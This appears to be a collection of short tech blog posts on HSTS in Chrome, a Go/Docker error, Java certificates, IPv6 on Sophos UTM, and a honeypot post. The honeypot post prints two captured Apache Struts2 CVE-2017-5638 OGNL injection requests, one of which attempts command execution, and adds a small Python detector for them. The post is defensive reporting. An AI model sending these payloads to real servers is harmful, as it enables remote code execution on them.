How to clear HSTS settings in Chrome

Developing against a site that uses HSTS can be painful when something is wrong with the site, for example a certificate problem, because you cannot bypass the warning once Chrome has “learned” that the site has HSTS rules.

Luckily you can manage and delete such entries on this page: chrome://net-internals/#hsts


go: cannot find main module; see ‘go help modules’

I was working on building a Docker image containing a Go application when I ran into the following error when running go tidy as a build step:
“go: cannot find main module; see ‘go help modules’”

The reason for this was that I had forgotten to specify a workdir in my Docker image (alternatively, specified a Go dir). Thus a fail-safe error is triggered, as Go simply gets confused over finding a go.mod in the GOPATH root folder, which is supposed to be within your source folder. [source]

The fix? Specify a WORKDIR in your Dockerfile.


Java + Let's Encrypt certificate giving SunCertPathBuilderException

While testing some Java code I have for doing a check against, I got an exception I have not seen before:

PKIX path building failed: unable to find valid certification path to requested target

After digging around I realised that the site in question has started using certificates from Let's Encrypt.

Java ships its known certificate providers bundled with the installation, so if your JRE/JDK installation is not quite up to date, the fix is as simple as upgrading to the latest release. (Anything >= Oracle Java 8u101 has the Let's Encrypt root cert bundled.)


CVE-2017-5638 scanning still going on

I recently wrote a honey pot that I am currently playing around with. It did not take long before suspicious traffic started popping up. Many of the scans/hacking attempts are against CVE-2017-5638, which relates to a security issue in Apache Struts2 that started getting exploited in March 2017.

The scans/hacking attempts I have seen regarding this in the last 24 hours are listed below; they do nothing more than to see if the security hole exists.

Type 1:

GET / HTTP/1.1
Content-Type: %{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#wmres=#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’]).(#wmres.getWriter().print(“S2-045 dir–***”)).(#wmreq=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’)).(#wmres.getWriter().println(#wmreq.getSession().getServletContext().getRealPath(“/”))).(#wmres.getWriter().flush()).(#wmres.getWriter().close())}.multipart/form-data
Accept: */*
Referer: http://**my honeypot IP**:81
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:**my honeypot IP**:81
Connection: Keep-Alive


Type 2:

GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’echo windows–2017′}:{‘/bin/bash’,’-c’,’echo linux–2017′})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}
Host:**my honeypot IP**:81
Connection: Keep-Alive
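
A small detector for the two request types above, added here as an example (it is not the honeypot's own code): it flags any request whose Content-Type header contains an OGNL expression opener and records which traits of the captured payloads are present. The sample requests are constructed and shortened, and the function and trait names are assumptions.

```python
import re

# Struts evaluates both %{...} and ${...}; a legitimate Content-Type contains neither.
OGNL_OPEN = re.compile(r"[%$]\{")
# Substrings taken from the two captured request types on this page.
TRAITS = {
    "member_access_override": "_memberAccess",
    "process_execution": "java.lang.ProcessBuilder",
    "response_write": "getWriter()",
}

# Constructed, shortened samples shaped like Type 1, Type 2 and a normal upload.
SAMPLES = [
    "GET / HTTP/1.1\nContent-Type: %{(#_memberAccess=1).(#r.getWriter().print('x'))}"
    ".multipart/form-data\nHost: honeypot.example:81\n",
    "GET /index.action HTTP/1.1\nContent-Type: %{(#_memberAccess?1:2)"
    ".(#p=new java.lang.ProcessBuilder(#c))}\nHost: honeypot.example:81\n",
    "POST /upload HTTP/1.1\nContent-Type: multipart/form-data; boundary=abc\n"
    "Host: honeypot.example:81\n",
]

def parse_headers(raw_request):
    """Return (request_line, {lowercased header name: value}) from raw request text."""
    lines = raw_request.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, sep, value = line.partition(":")  # split on the first colon only
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers

def classify(raw_request):
    """Return a finding dict if Content-Type carries an OGNL expression, else None."""
    request_line, headers = parse_headers(raw_request)
    ctype = headers.get("content-type", "")
    if not OGNL_OPEN.search(ctype):
        return None
    traits = sorted(name for name, needle in TRAITS.items() if needle in ctype)
    return {"request_line": request_line, "traits": traits}

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```

A finding with the process_execution trait is the Type 2 pattern (command execution attempted), while response_write without it matches the Type 1 path-disclosure probe.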


How to enable IPv6 on your Sophos UTM (Former Astaro Unified Threat Management)

Step 1: After logging in to the admin interface, go to Interfaces and Routing -> IPv6, and enable “IPv6 status”. As my UTM receives an IPv6 prefix from my ISP, I end up with this:

[Image 1]

Step 2: Assign an IPv6 address to your internal interface. This address should be the first IP in your assigned IPv6 prefix. To calculate your range, copy your delegated prefix and go to this calculator. Notice that I have used a /64-prefix internally.

[Image 2]

Step 3: Go to Interfaces and Routing -> IPv6 -> Prefix Advertisement. Select your internal interface. Then add the IPv6 address of your DNS server, or the IP of your internal interface if your UTM handles DNS itself.

[Image 3]

And voila, your internal clients should now be able to receive IPv6 addresses. I recommend rebooting both the UTM and any clients if they do not get any addresses at this point.